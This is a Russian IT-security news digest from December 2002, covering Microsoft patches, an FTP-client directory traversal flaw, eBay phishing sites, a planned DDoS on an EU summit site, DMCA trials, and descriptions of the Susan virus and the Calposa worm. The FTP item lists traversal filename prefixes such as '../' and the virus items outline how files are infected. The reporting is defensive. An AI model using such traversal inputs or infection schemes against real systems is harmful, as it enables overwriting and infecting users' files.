Компания SoftLine проводит 17 декабря 2002г. бесплатный семинар "Антивирусные продукты Doctor Web для частных и корпоративных пользователей". Семинар посвящен подробному освещению современных версий антивирусных программ семейства Doctor Web, а также описанию методики построения систем антивирусной безопасности корпоративных сетей на базе Dr.Web(R). На семинаре специалисты "ДиалогНауки" подробно расскажут о современных версиях Doctor Web, об используемых в этих программах технологиях обнаружения вирусов и троянских программ, о методах защиты корпоративных сетей от вирусных атак. В конце семинара специалисты ДиалогНауки ответят на вопросы слушателей. Как обычно, для участия в семинаре необходимо предварительно зарегистрироваться. Подробности - http://www.softline.ru/seminars
13/12/2002 16:55 Новые патчи от Microsoft.
Детище Билла Гейтса выпустило 2 очередных патча с номерами бюллетеней по безопасности: MS02-069, MS02-070. Первый включает в себя восемь исправлений виртуальной JVM, каждое из которых борется с тем или иным способом обойти систему безопасности, что-то исполнить на машине клиента, перехватить его действия, просто аварийно завершить броузер и т.п. Второй патч исправляет ошибку в реализации цифровой подписи SMB-блоков, позволяющую атакующему обмануть систему и заставить ее обойтись без этой самой подписи. Подпись SMB-пакетов была введена только начиная с Windows'2000, и по умолчанию отключена. В новости была использована информация RSN сайта www.bugtraq.ru. Бюллетень MS02-069 - http://www.microsoft.com/security/security_bulletins/ms02-069.asp Бюллетень MS02-070 - http://www.microsoft.com/security/security_bulletins/ms02-070.asp
13/12/2002 16:33 Уязвимость во многих FTP-клиентах.
Стив Кристи (Steve Christey) сообщает об обнаружении уязвимости во многих FTP-клиентах, в том числе и во строенных в популярные Web-броузеры. Уязвимость позволяет ftp-серверу переписать любой файл на машине клиента, отдавая имена файлов, начинающиеся с "/" или "/../". Подобная уязвимость в терминологии сетевой безопасности называется directory traversal. Для реализации уязвимости был написан специальный "фальшивый" FTP-сервер с названием ftp4all, который в ответ на команды "LIST" и "MGET" формировал имена файлов, предваряемые символами "../" и подобными им ( в качестве примера приводятся также: "/path", "..\", "C:", "..."). Подобная методология проверок безопасности получила название PROTOS и была разработана и теоретически обоснована в университете Оулу (Oulu University Secure Programming Group) ещё в 1997 г. После проведённой проверки был установлен ряд клиентов, которые сохраняли файлы за пределами текущий директории пользователя. Среди "жертв" указываются следующие клиенты: wget (версии до 1.8.1), клиент ОС OpenBSD 3.0, клиент ОС Solaris 2.6, 7, также указывается об уязвимости IRIX FTP-клиента. В качестве некоторых мер противодействия до выхода патчей рекомендуется скачивать файлы в интерактивном режиме и с включённой командой "runique" в FTP-клиенте. Необходимо отметить, что RedHat, Mandrake, Debian уже выпустили обновление своих клиентов. Подробности - http://online.securityfocus.com/archive/1/302956
13/12/2002 16:05 Очередной поддельный сайт eBay.
Согласно информации независимого американского института анализа проблем безопасности в интернете SANS, хакеры вновь попытались обмануть пользователей интернет-аукциона компании eBay Inc. Для этого они открыли поддельный сайт ebayupdates.com, сервер которого находился во Флориде. Аналогичная попытка была предпринята хакерами в конце ноября, когда для обмана клиентов злоумышленники использовали фиктивный сайт change- eBay.com. Как и в прошлый раз, мошенники рассылали на почтовые ящики пользователей eBay сообщения якобы от лица администрации аукциона с просьбой зарегистрироваться на их сайте. Письмо гласило: "Уважаемый пользователь eBay, с сожалением сообщаем Вам, что у нас возникли проблемы с информацией о Вашем счете". Для подтверждения регистрации преступники просили вводить посетителей сайта номера своих кредитных карт. После этого закрытая информация поступала мошенникам, которые таким образом получали возможность снять средства со счетов посетителей сайта www.ebayupdates.com. Для того чтобы ввести пользователей в заблуждение мошенники оформили фиктивный сайт точно так же, как настоящий сайт eBay Inc. Источник - http://www.viruslist.com/
13/12/2002 15:52 Предновогодний конкурс от "Касперского".
"Лаборатория Касперского" приглашает пользователей принять участие в компьютерной игре "Охота на вирусы" на сайте компании и попробовать свои силы в виртуальном сражении с кибер-вредителями. Лучших игроков ждут ценные подарки к Новому Году. Специально к новогодним праздникам "Лаборатория Касперского" разместила на сайте виртуальную компьютерную игру "Охота на вирусы". Теперь можно совместить приятное с полезным - поиграть и получить ценные призы и оригинальные сувениры от компании. Игра содержит пять уровней сложности: два отборочных и три призовых. Пользователи, прошедшие первые два уровня, смогут побороться за ценные подарки и вписать свое имя в историю вирусоловства. Участвуйте - проверьте свои навыки и умения! ;) Подробности - http://www.kaspersky.ru/game.html
13/12/2002 15:18 U-Wipe не оставляет следов.
Компания „Network Research Lab“ (NR Lab) объявляет о выходе программы U-Wipe, полностью стирающей „следы“ работы на компьютере. Как известно, Microsoft Windows, большинство офисных программ и многие другие приложения фиксируют информацию о деятельности пользователя. U-Wipe является не просто инструментом для удаления лишних объектов - она позволяет управлять данными, относящимися к категории частных. U-Wipe сохраняет конфиденциальность работы и дает возможность управления этими данными. С помощью утилиты U-Wipe возможно удаление/очищение таких элементов как журналы документов, поиска, запуска, а так же содержимое папки TEMP, Downloaded Program Files и корзины, объекты Cookies, списки MRU и прочее. В каждом конкретном случае пользователь принимает самостоятельное решение о том, какие элементы подлежат удалению. Таким образом, утилита U-Wipe способствует повышению скорости работы всей системы, очищает дисковое пространство и позволяет обезопасить работу в сети. U-Wipe интегрирована с Windows9x/Me/NT/2000 и поддерживает работу с такими приложениями как Microsoft Internet Explorer (IE) версии 4.0 и выше, Microsoft Office 7.0, 97, 2000, ХР, Netscape Navigator 5/6. Cайт - http://www.u-wipe.com/
12/12/2002 19:48 Изменение ценовой политики крупных российских провайдеров привело к закрытию ftp-сервера ALT Linux.
Компания ALT Linux, один из ведущих российских разработчиков дистрибутивов ОС Linux, была вынуждена временно закрыть доступ к своему ftp-сайту, с которого распространялись образы компакт-дисков с дистрибутивом операционной системы ALT Linux и дополнительными пакетами для нее. Причиной закрытия доступа к ftp-сайту стали изменения пиринговой политики крупнейших провайдеров - Ростелеком, "МТУ-Интел" и Golden Telecom. До недавнего времени российский трафик оставался бесплатным или оплачивался по льготным расценкам. Теперь же стоимость перекачки данных внутри России и между Россией и другими государствами практически сравнялась. С введением новых тарифов расходы на оплату многогигабайтного трафика с ftp- сайта стали слишком велики. Как подчеркнул один из сотрудников компании на форуме сайта Linux RuNet, в настоящее время компания ищет варианты выхода из ситуации. Пока для загрузки дистрибутовов ALT Linux и программных пакетов рекомендуется пользоваться зеркалами официального сайта. Введения платного доступа к дистрибутивам не планируется. Нужно отметить, что закрытие ftp-сайта ALT Linux стало не единственным следствием повышения расценок за российский трафик. На прошлой неделе несогласованность между провайдерами "Зенон Н.С.П." и "МТУ-Интел" привела к потере связности между сетями этих провайдров. В результате, на сайты, расположенные в сети "МТУ-Интел" не могли попасть пользователи "Зенона", и наоборот. Источник - http://www.compulenta.ru
12/12/2002 19:19 Выпуск FreeBSD 5.0-RC1.
Murray Stokely из команды разработчиков FreeBSD сообщил, что они стали на один шаг ближе к окончательному релизу. 5.0-RC1 доступна для i386, alpha, sparc64 и ia64. Источник - www.linux.org.ru. ISO images and FTP installation - ftp://ftp.freebsd.org/pub/FreeBSD/
12/12/2002 18:59 Microsoft предложит Linux-версии своего ПО?
Microsoft коренным образом изменит свою стратегию и в 2004 году выпустит версии веб-сервисов и серверного ПО для операционной системы Linux, предсказывает аналитическая фирма META Group. META Group прогнозирует, что к 2007 году Linux будет применяться почти на половине новых серверов, вместо теперешних 15-20%, и Microsoft будет все труднее игнорировать эту платформу при распространении своих серверных приложений СУБД, веб-хостинга и e-mail. «Мы уверены, что начиная со второй половины 2004 года Microsoft (и ее партнеры) начнут переносить некоторые из своих проприетарных приложений (таких, как компоненты .Net) на среду Linux; затем к ним постепенно добавятся основные продукты back-office, такие как Microsoft SQL Server, IIS и Exchange», — пишет META Group. Более того, META Group утверждает, что Microsoft изменит цены или разделит свою серверную операционную систему Windows таким образом, «чтобы сделать ее сопоставимой с „бесплатной” Linux». Подробности - http://www.zdnet.ru/?ID=293012
12/12/2002 18:20 Утверждены спецификации XML-шифрования.
Во вторник головная организация по стандартизации веб-технологий утвердила спецификации шифрования XML, что обещает ускорить разработку надежных веб-сервисов. Пара спецификаций, XML Encryption Syntax and Processing и Decryption Transform for XML Signature, позволит веб-страницам в стандарте Extensible Markup Language шифровать те фрагменты документа, которые участвуют в обмене между веб-сайтами. Хотя существуют другие способы шифрования XML-документов, спецификации W3C позволяют шифровать отдельные разделы или фрагменты документа — например, номер кредитной карты, введенный в XML-форму. «Они обеспечивают средства для указания фрагментов XML-документа, которые автор желает защитить, так что появляется возможность выбрать наиболее важные места и зашифровать их», — пояснил представитель W3C. Предполагается, что новые спецификации помогут ускорить разработку веб-сервисов на базе XML — кода, позволяющего программистам создавать специализированные языки для обмена специфическими данными. Работа W3C над шифрованием — часть более крупного проекта по созданию стандартов, относящихся к веб-сервисам. В начале этого года консорциум критиковали за то, что он медленно осваивает веб-сервисы, но с тех пор был опубликован целый ряд относящихся к этой технологии проектов. Технологией XML-шифрования занимается рабочая группа шифрования W3C, в которую входят такие компании, как Microsoft, Motorola, IBM, Sun Microsystems, VeriSign и BEA Systems. Подробности - http://zdnet.com.com/2100-1104-976701.html
12/12/2002 18:07 Хакеры-антиглобалисты планируют вывести из строя сайт очередного саммита Евросоюза.
Датская антиглобалистская организация Global Roots планирует провести в интернете акцию протеста против очередного саммита Европейского Союза, который пройдет в Копенгагене 12-13 декабря. Участники Global Roots собираются организовать распределенную DoS-атаку на официальный сайт саммита и вывести его из строя. В акции примут участие около 10000 человек, которые не смогут приехать в Данию и лично участвовать в демонстрациях протеста. Как утверждают в Global Roots, 13 декабря сразу все участники акции запустят на своих компьютерах программу WebScript и попытаются перегрузить сайт ЕС ложными запросами и заблокировать к нему доступ. Продлится эта акция протеста вплоть до 15 ноября. В Global Roots утверждают, что их планы не являются противозаконными и не имеют ничего общего с хакерством - злонамеренным взломом компьютерных сетей. "Мы считаем необходимым демонстрировать свое несогласие с политикой ЕС. Люди в бедных странах умирают из-за западного либерализма", - заявил в интервью Reuters активист Global Roots Томас Йенсен. Источник - http://www.compulenta.ru
12/12/2002 17:40 Новые возможности Google.
На сайте Google Labs, где компания Google проводит обкатку новых поисковых технологий, появились два новых проекта, призванных сделать процесс поиска нужной информации еще проще и удобнее. Первый проект - Google Viewer - представляет собой новый поисковый интерфейс. Результаты поиска в "Google-просмотрщике" представляются не в виде привычного всем списка из десятка-другого ссылок с краткими комментариями, а в виде слайд-шоу. При этом в верхней части экрана находится строка поиска, дополненная кнопками управления слайд-шоу. Второй новый сервис получил название Google WebQuotes. При его использовании каждый из результатов поиска аннотируется краткими комментариями с других сайтов. Согласно планам Google, это поможет пользователю получить дополнительную информацию о найденном сайте из других источников, что позволяет лучше судить о репутации того или иного веб-ресурса. Число выведенных комментариев можно выбрать самостоятельно. По умолчанию оно равно трем. Сайт Google Labs - http://labs.google.com/
12/12/2002 17:27 Дмитрий Скляров заявил в американском суде, что считает себя невиновным.
Российский ученый и программист Дмитрий Скляров заявил на проходящих в Сан-Хосе (Калифорния, США) слушаниях по делу о нарушении прав интеллектуальной собственности, что не считает себя виновным. 27-летнего Склярова обвиняют в том, что он написал программу, позволяющую обходить защиту электронных книг в формате Adobe eBook и таким образом - считают обвинители - нарушающую закон США об авторском праве в цифровую эпоху (DMCA). Как заявил суду Скляров, то, что он сделал, законно в России, и он совершенно не думал о том, может ли его программа нарушать закон США, когда писал ее по заказу своего работодателя - московской компании "Элкомсофт", против которой и выдвинуты обвинения. В частности, компания обвиняется в том, что продавала программное обеспечение, позволяющее обходить электронную защиту другой, имеющей копирайт, программы. Поначалу вместе с "Элкомсофтом" обвинялся и Скляров, но американские власти освободили его от ответственности в обмен на то, что он даст показания против "Элкомсофта". Таким образом, российский программист проходит свидетелем по первому в истории уголовному делу, возбужденному за нарушение американского закона DMCA, принятого не так давно - в 1998 году. "Я считаю, что это было законно, - заявил Дмитрий Скляров. - Я по-прежнему так считаю. Моей целью было позволить людям, которые законно обладают электронными книгами, использовать их так, как им удобно, читать их на любом компьютере". Ранее Скляров заявлял, что написал приблизительно 80% программы Advanced eBook Processor в рамках своей диссертации. Более подробно - http://www.cnews.ru/news/ebusiness/2002/12/11/20021211142622.shtml
12/12/2002 17:12 Британская полиция предупреждает: киберпреступность становится более организованной.
Доля компьютерных преступлений, совершенных в интернете организованными группами, резко растет, предупреждает Британский национальный отдел по борьбе с преступлениями с использованием высоких технологий (National Hi-Tech Crime Unit). В своей речи на открытии первого британского конгресса по электронным преступлениям, начальник отдела Лес Хайндс (Les Hynds) осветил важность угрозы, которую представляют организованные криминальные группы. "Высокотехнологичная преступность сильно растет, - сказал Хайндс. - Интернет позволяет организованным преступным группам быстро получить прибыль с относительно небольшим риском быть пойманными". По его мнению, онлайновые преступления иногда более вредны, чем обычные: "К высокотехнологичным преступлениям относятся любые, частью совершения которых является цифровая среда. Это должно считаться отягчающими обстоятельствами, поскольку, используя Сеть, можно нарушать закон удаленно, быстро и независимо от гражданства и места пребывания. Поскольку преступникам стало легче делать жертвами множество людей, прятать доказательства и награбленное, я уверен, что мы должны изменить ошибочное мнение о том, что высокотехнологичная преступность менее серьезна". Источник - http://www.theregister.co.uk/
12/12/2002 16:55 Статья "Прозрачная аутентификация в беспроводных сетях".
На сайте mobile-review опубликована статья Нихила М. Дешпэнда, старшего технического инженера по маркетингу подразделения Intel Technology Group, под названием "Прозрачная аутентификация в беспроводных сетях" на русском языке. Оригинал был написан 13.06.2002 г. Посвящена описанию механизмов аутентификации в локальных и глобальных беспроводных сетях различны, а также описанию моделей беспроводного роуминга. Может представлять интерес для специалистов по безопасности беспроводных сетей. Статья - http://mobile-review.com/articles/2002/aut-across-network.shtml
12/12/2002 13:48 Linux 2.4.21-pre1.
Вышел первый препатч ядра 2.4.21. В даном апдейте:- Множественные обновления в usbfs
- Исправления в коде IDE
- Добавлена поддержка AGP для VIA KT400
- Добавлены вызовы netif_carrier_{on,off}
и многое другое. Подробности - http://linuxtoday.com/news_story.php3?ltsn=2002-12-11-010-26-NW-KN-DV
12/12/2002 13:45 Новый "Linux 2.5 changes document".
Dave Jones опубликовал новую версию "Linux 2.5 changes document". Обзор включает в себя описание нововведений ветви, необходимых для корректной работы утилит и многое другое. Ознакомиться - http://lwn.net/Articles/17846/
10/12/2002 21:30 Статья "Создание бездисковых терминалов"
В данной статье расcматривается создание бездисковых терминалов на базе ОС FreeBSD. В статье описывается настройка сервера удаленной загрузки и создание бездисковых клиентов, на которых можно запускать Х-сервер. На сервере удаленной загрузки используется пакет isc-dhcp, который имеет поддержку протокола bootp, на клиентских машинах сетевая карта с поддержкой PXE. Статья - http://www.freebsd.org.ru/how-to/diskless/diskless.html
9/12/2002 13:30 При содействии ФБР в Израиле задержан хакер.
В конце прошлой недели в Израиле местная полиция при содействии ФБР арестовала 24-летнего жителя Хайфы Давида Штенберга. Запрос на поимку Давида Штенберга ФБР направило израильским полицейским еще два года назад. Только год спустя в Израиле стали предприниматься действия для розыска преступника. Штенберг подозревается в незаконном проникновении в сеть одной из американских компаний, занимающейся продажей CD и DVD-дисков. Название компании пока не разглашается. Мошенник получил доступ к персональной информации о 80 тысячах клиентах компании, в том числе, к номерам их кредитных карточек. В момент задержания в минувшую пятницу Давид Штенберг находился в машине, которая числилась в списке угнанных. До начала суда преступник будет находиться в предварительном заключении. Источник - http://lenta.ru
9/12/2002 12:48 Autopackage - инструмент для управления пакетами в Linux.
Всем, кто работал в ОС Linux, известно о трудностях, связанных с управлением установленным программным обеспечением. Помимо ведения общей базы пакетов, необходимо, чтобы пакеты также отслеживали зависимости дру с другом, с остальными библиотеками и т.д. Кроме того, при наличии RPM (aptget, dpkg) и дальнейшей сборке пакета из исходников, довольно тяжело включить установленный пакет в базу установленного ПО. Предлагается очередная попытка решения этой проблемы - инструмент под названием autopackage. Autopackage умеет: создавать пакеты, которые в дальнейшем могут быть инсталлированы в любом дистрибутиве Linux, cоздавать интерактивные пакеты, поддерживать выход на многих языках, автоматически проверять и разрешать зависимости (dependancies) между остальными пакетами, вне зависимости от того, каким методом они были инсталлированы (из исходников, или из одного из инструментов управления пакетами). Проект зародился в июле 2002 г. В настоящее время находится в состоянии развития - текущая версия 0.2 и не имеет на настоящий момент графической оболочки. Поддерживается обновление через систему отслеживания версий CVS. Автор проекта - Майк Хёрн (Mike Hearn). Подробное описание - http://www.osnews.com/story.php?news_id=2307 Сайт проекта - http://autopackage.org/
9/12/2002 12:04 Начался судебный процесс над создателем программы для взлома защиты DVD.
В понедельник в суде города Осло должны начаться слушания по делу 19-летнего хакера Йона Леха Йохансена, который несколько лет назад создал знаменитую программу DeCSS, предназначенную для взлома системы защиты от копирования дисков DVD. Началу судебного процесса в Норвегии предществовало долгое судебное разбирательство на территории США, которое привело к запрету публикации исходного кода DeCSS на территории этой страны. Йохансен написал DeCSS в возрасте 15 лет (!), для того чтобы получить возможность смотреть фильмы на DVD с помощью своего компьютера, работающего под Linux. Официального программного плеера для этой платформы выпущено не было, и энтузиасты были вынуждены прибегнуть к хакерским методам. Тем не менее, DeCSS может использоваться и реально используется для взлома защиты DVD с целью их дальнейшего копирования, что, разумеется, не по душе монстрам киноиндустрии. Источник - http://www.ap.org/
9/12/2002 11:39 Каким образом корневые DNS-серверы оказались такими уязвимыми.
Политика организации ICANN, управляющей системой доменных имен интернета (DNS), не отвечает общественным интересам. Так считает один из членов совета директоров этой организации Карл Ауэрбах, известный как один из наиболее непримиримых критиков деятельности ICANN. В своем интервью журналисту Ричарду Коману, опубликованном на сайте O'Reilly Network, Ауэрбах опять говорит о своем несогласии с высшим руководством ICANN и политикой этой организации в целом. Одним из главных вопросов, обсуждавшихся в интервью стала безопасность интернета и системы доменных имен. В частности, Ауэрбах отметил тот факт, что DNS является единственной составной частью интернета, управление которой централизовано. Из-за этого, считает Ауэрбах, именно DNS представляет собой самую уязвимую часть интернета, отличным подтверждением чему служит недавняя массированная DoS-атака, выведшая из строя семь из тринадцати корневых DNS-серверов интернета. По словам Ауэрбаха, в структуре интернета действительно существуют элементы, требующие определенной централизации. Это, к примеру, распределение IP- адресов - оно должно некоторым образом соотноситься с физической топологией Сети. Однако мнение о том, что система доменных имен нуждается в аналогичном подходе является, по Ауэрбаху, в корне ошибочным. Комментируя октябрьскую DoS-атаку, Ауэрбах заявил, что ICANN не делает практически ничего для обеспечения безопасности Сети. Более года назад, после трагических событий 11 сентября, в ICANN был образован специальный комитет по выработке мер обеспечения безопасности DNS. Однако никаких результатов работы этого комитета до сих пор не представлено. А выдвинутые Ауэрбахом предложения по укреплению безопасности были попросту проигнорированы. По собственным словам Ауэрбаха, в комитете работают прекрасные технические эксперты, однако они совершенно не знакомы с методиками расследования киберпреступлений и способами ликвидации их последствий. Полный текст интервью - http://www.compulenta.ru/2002/12/9/36198/
9/12/2002 11:17 Американские брокеры поплатятся за недобросовестное ведение электронной переписки.
Пять крупных американских брокерских компаний, включая Morgan Stanley, Goldman Sachs и Salomon Smith Barney согласились выплатить в общей сложности $8,25 млн. штрафа в наказание за неисполнение требований по хранению сообщений электронной почты. Комиссия по ценным бумагам и биржам, Нью- йоркская фондовая биржа и Национальная ассоциация дилеров по ценным бумагам заявили, что провели независимые проверки, как брокерские компании выполняют требования по хранению сообщений электронной почты за период с 1999 по 2001 годы. Действующими правилами Нью-йоркской фондовой биржи брокерам и дилерам предписывается 3 года хранить электронные документы, относящиеся к проводимым ими операциям. Не признавая, но и не отвергая фактов нарушения, три названные выше компании, а также Deutsche Bank Securities и U.S. Bancorp Piper Jaffray согласились выплатить по $1,65 млн. каждая и в течении трех месяцев отчитаться о мерах, принятых для исправления ситуации. Как отмечают проводившие проверку специалисты, некоторые компании обязывали сотрудников сохранять копии электронных писем на жестких дисках персональных компьютеров, но не вырабатывали четких процедур для контроля за выполнением этих требований. Кроме того, с уходом сотрудников из компаний старые письма нередко стирались новыми пользователями. Имеющиеся резервные копии хранились на множестве кассет и дисков, однако отсутствовал жесткий учет за местонахождением данных. Источник - http://www.cnews.ru
8/12/2002 16:54 Аль-Каеда производит ПО для правительственных учреждений США?
Как утверждает ABCNEWS, федеральными агентами был произведён обыск в одной фирме в Бостоне. Фирма производила программное обеспечение для федеральных организаций, в том числе и ФБР. Было установлено, что неофициальным владельцем фирмы Ptech Inc., штаб-квартире которой находится в Quincy (штат Массачусетс), является некий Qassin al-Kadi, один из 12 бизнесменов Сайдовской Аравии, осуществляющих финансирование и отмывание денег для небезизвестной Аль-Каеды и непосредственно связанных с террористической сетью Осамы бен Ладена. Один из федеральных агентов в частной беседе с ABCNEWS высказал предположение, что Аль Каеда могла получить доступ к важным правительственным секретным данным через софтверную компанию, поскольку последняя обеспечивала программным обеспечением такие правительственные структуры, как ФБР, ВМС, ВВС и агентства, связанные с разработкой и испытанием ядерных технологий. Более подробно - http://www.abcnews.go.com/sections/GMA/DailyNews/terror_raid021206.html
8/12/2002 16:42 Мошенник обманывал покупателей eBay.
В США задержан и на время следствия заключен под стражу 27-летний житель Лос-Анджелеса Крис Чонг Ким, который обвиняется в обмане покупателей известного онлайнового аукциона eBay. Мошенник получал деньги за проданные компьютеры и комплектующие, после чего Чонг Ким не отправлял товар покупателям. Крис Чонг Ким обвиняется по четырем пунктам о хищениях в крупных размерах и по 26 пунктам - в обмане покупателей компьютерного оборудования, продаваемого через eBay. Ким в течение двух лет занимался торговлей компьютерами через компанию Calvin Auctions. Однако в апреле Ким прекратил поставку компьютеров и комплектующих, но продолжил предлагать их через eBay. Всего администрация аукциона получила более 170 жалоб обманутых покупателей, каждый из которых потерял от 1900 до 6000 долларов. Он может освободиться под залог в размере 400 тысяч долл. США. Если Крис Чонг Ким будет признан виновным, ему грозит до 24 лет лишения свободы. Сумма ущерба, нанесенного Кимом 26 гражданам США, аукциону eBay и Bank of America, составляет 453 тысячи долл. США. Источник - http://www.compulenta.ru
8/12/2002 16:23 Выход OpenSSL 0.9.6h.
OpenSSL Project Team объявила о выпуске очередного релиза OpenSSL, продукта для реализации SSL/TLS. В основном в новой версии пофиксены старые баги. Подробности - http://www.openssl.org/source/
8/12/2002 16:12 Безопасный syslog-демон.
Группа Security Technologies и Суперкомпьютерный Центр Сан-Диего (San Diego Supercomputer Center - SDSC) анонсировали продукт под названием "SDSC secure syslog", предназначенный для замены стандартного демона системного аудита во многих UNIX - системах syslog. SDSC secure syslog обеспечивает высокую степень безопасности, гибкости и быстродействия к функциональности стандартного syslog-демона. Кроме того, это первый продукт, соотвествующий RFC 3195, в котором описаны требования к надёжному syslog-у ("syslog-reliable" в терминах RFC). Подробности - http://security.sdsc.edu/software/sdsc-syslog
8/12/2002 15:28 Серверная ОС Sun Solaris может стать open-source.
Руководство компании Sun Microsystems анализирует возможность придания серверной операционной системе Solaris статуса open-source. С помощью такого шага Sun надеется способствовать увеличению рыночной доли своей ОС. В настоящее время Sun предоставляет возможность скачать бесплатно исходники предыдущей, 8-й версии Solaris, но лицензия на нее ставит довольно жесткие ограничения и не позволяет назвать ее open-source в полной мере. Примером того, что снижение цены продукта повышает на него спрос, стала также программа тестирования (Early Access Program) Solaris 9 для платформы x86. В течение октября и ноября ее бета-версию скачали, заплатив 20$, более 1,4 млн. человек. Тем не менее, в Sun не склонны полагаться на лицензию open-source как на универсальное средство. Корпоративные заказчики, владельцы мощных серверов и основные покупатели Solaris, предъявляют свои требования, которым модель open-source зачастую не может соответствовать. Источник - http://www.sun.com/
8/12/2002 15:16 Новая идеология SGI.
SGI объявила о сроках выхода линейки новых серверов на базе архитектуры Intel Itanium 2 и операционной системы Linux. Новые системы призваны сделать традиционно элитарную компанию ближе к пользователям, использующим стандартные архитектуры. Официальное объявление о будущих системах произойдет 15 января 2003 года. Об этом было объявлено на вчерашней пресс-конференции, посвященной предварительным итогам полуторагодичной работы компании SIT (Silicon Information Technologies), входящей в холдинг DPI и являющейся национальным дистрибьютором SGI на территории России и стран СНГ. Также на пресс-конференции было еще раз подчеркнуто то, что SGI намерена поддерживать архитектуру MIPS, как минимум, до 2007 года, выпуская новые модели систем, а техническая поддержка машин продолжится в течение еще более длительного времени. Источник - http://www.cnews.ru/
7/12/2002 19:48 Ошибка в коде Linux 2.4.20 ext3fs
Недавно была обнаружена проблема коде файловой системы ext3 в ядре 2.4.20. Ошибка проявлялась при попытке монтировать раздел с опцией data=journal и могла привести к потере данных. Патч/Источник - http://lwn.net/Articles/17447/
7/12/2002 18:29 Статья "Конфигурирование Tomcat и Apach с JK 2.1"
Статья "Configuring Tomcat and Apache With JK 1.2" Джеймса Гудвилла на сервере onjava.com, что обозначает O'Reilly on Java, описывает процесс настройки взаимодействия сервера Tomcat и Apache редактированием файлов server.xml и httpd.conf. О связке Tomcat, Apache, модуль mod_jk мы рассказывали раньше в одной из новости, посвящённой безопасности этих компонентов. Статья - http://www.onjava.com/pub/a/onjava/2002/11/20/tomcat.html
7/12/2002 18:20 Выход версии 4.29а программ Dr.Web.
Вышла версия 4.29a программ антивирусного семейства Dr.Web. В новых версиях сделаны следующие изменения: добавлена возможность проверки файлов, упакованных DXPACK, PCSHRINK, исправлена работа консольных версий сканеров при работе с ключом /DA, откорректировано сканирование каталогов с очень большой вложенностью. Усовершенствованы механизм распознавания почтовых MIME-файлов, механизм проверки RAR-архивов, механизм автоматического обновления (введена корректная обработка префиксов "=" и "+"). В программе обновления добавлена возможность указания файла ведения отчета (ключ /RP). Дополнены возможности инсталляционной программы: исключена необходимость перезагрузки компьютера при установке пакета в случае активного SpIDer Guard, добавлены возможности корректной установки пакета в каталоги с русскими именами и выборочной деинсталляции отдельных модулей, а так же доработан механизм автоматического обновления при установке пакета. Подробнее - http://www.drweb.ru/
7/12/2002 18:03 Статья "Кризис жанра в IP".
Maxim A.Kuznetcov написал статью, в которой рассматривает недостатки TCP/IP в условиях все большего проникновения коммерции в сеть. Opennet.ru её выложил. Почитайте на досуге в качестве развлекательного чтения. основная идея: "Последние события связанные с выходом из пиринговых соглашений крупных Российских копаний и соответсвенным увеличением доли платного трафика для конечных пользователей сети, дали повод для активных размышлений и некоторых мыслей. Главная мысль - грядет его величество сетевой кризис, причем связанный не непосредственно с действиями некоторых компаний, а с тем что протокол IP как сетевой/транспортный протокол для конечных пользователей устарел и не годен для дальнейшего комерческого использования." Cтатья - http://www.opennet.ru/opennews/art.shtml?num=1820
7/12/2002 17:39 Суд над ElcomSoft: незаконных копий eBook не найдено.
В среду сотрудник Adobe Systems, свидетельствуя в федеральном суде по делу о нарушении закона об авторском праве, признал, что его компания не выявила ни одной неавторизованной электронной книги, созданной при помощи программного обеспечения ElcomSoft. Российскому программисту Дмитрию Склярову, сотруднику ElcomSoft, вряд ли придется свидетельствовать против своей компании. Прокуроры дали понять, что они планируют опросить других свидетелей по поводу показаний, уже данных Скляровым, и, возможно, продемонстрируют суду видеозапись. Если правительство не вызовет Склярова в качестве свидетеля, сделать это обещает защита. Подробности - http://www.zdnet.ru/?ID=292827
7/12/2002 17:25 НР провожает Alpha в последний путь.
В январе Hewlett-Packard планирует завершить последнюю принципиальную модернизацию своего процессора Alpha, выпустив версию EV7, после чего будет готовить почву для ухода этого легендарного high-end чипа в историю. Через год последует обновленная версия EV79. Затем НР планирует перевести Alpha в так называемый режим поддержки. Как заверили руководители НР на состоявшейся на этой неделе конференции для финансовых аналитиков, этот шаг должен сэкономить компании сотни миллионов долларов. План обновления Alpha несколько отличается от предыдущего графика НР. В мае НР заявила, что EV7 дебютирует в конце 2002 года. НР дает Alpha отставку вместе с процессором PA-RISC — в пользу создания систем на базе процессоров Intel Itanium, в разработке архитектуры которого НР принимала участие. Остановившись на Itanium, компания рассчитывает существенно сэкономить на разработке. Однако при этом она делает большую ставку на то, что продажи Itanium- серверов компенсируют доходы НР от бизнеса систем на платформах Alpha и PA-RISC. Отказ от Alpha планируется давно. В июне 2001 года, всего за три месяца до объявления о слиянии НР и Compaq Computer, Compaq сообщила о планах прекращения работы над Alpha и о передаче большей части технологии Intel. НР прекратит выпуск новых процессоров Alpha к 2004 году и постарается убедить заказчиков перейти к этому времени на системы Itanium. Системы на базе процессоров Alpha будут продаваться до тех пор, пока на них сохранится спрос, предположительно до 2006 года. Источник - http://zdnet.com.com
7/12/2002 17:13 Описание вируса Susan.
Обнаружен новый неопасный резидентный Win32 вирус-компаньон Susan. Он является приложением Windows (PE EXE-файл), имеет размер около 66K, написан на Delphi. Ищет активные .EXE-файлы в каталоге Windows, в каталоге "Program Files", во всех подкаталогах диска C: и заражает их. При заражении переменовывает файл, прибавляя к имени файла символ "2" и записывает свою копию под первоначальным именем заражаемого файла. При запуске зараженного файла вирус ищет файл-носитель (с символом "2" в конце имени) и запускает его на выполнение. Таким образом вирус возвращает управление зараженному файлу. Первые два ключа содержат счетчики, в зависимости от значений которых активизируется процедура заражения файлов. В третий ключ записывается общее количество файлов, зараженных на данном компьютере. Если в этом ключе записано значение "1", то вирус немедленно прекращает работу (без заражения и без копирования себя в каталог Windows). Подробности - http://www.viruslist.com/index.html?tnews=1003&id=1439383
7/12/2002 16:49 Червь Calposa распространяется через Интернет и по сети Kazaa.
Обнаружен новый червь Calposa, который распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам, и по сети обмена файлами Kazaa. Calposa является приложением Windows (PE EXE-файл), имеет размер около 57K написан на Visual Basic. Червь копирует себя в каталог "C:\Program Files\KaZaa\My Shared Folder\". В том случае, если этот каталог является каталогом обмена файлами Kazaa, червь способен распространяться по сети Kazaa. 16-го февраля выводит картинку с текстом "ANVX by industry". Подробнее - http://www.viruslist.com/index.html?tnews=1003&id=1438714
7/12/2002 16:27 "Лаборатория Касперского" расширяет линейку продуктов по защите данных.
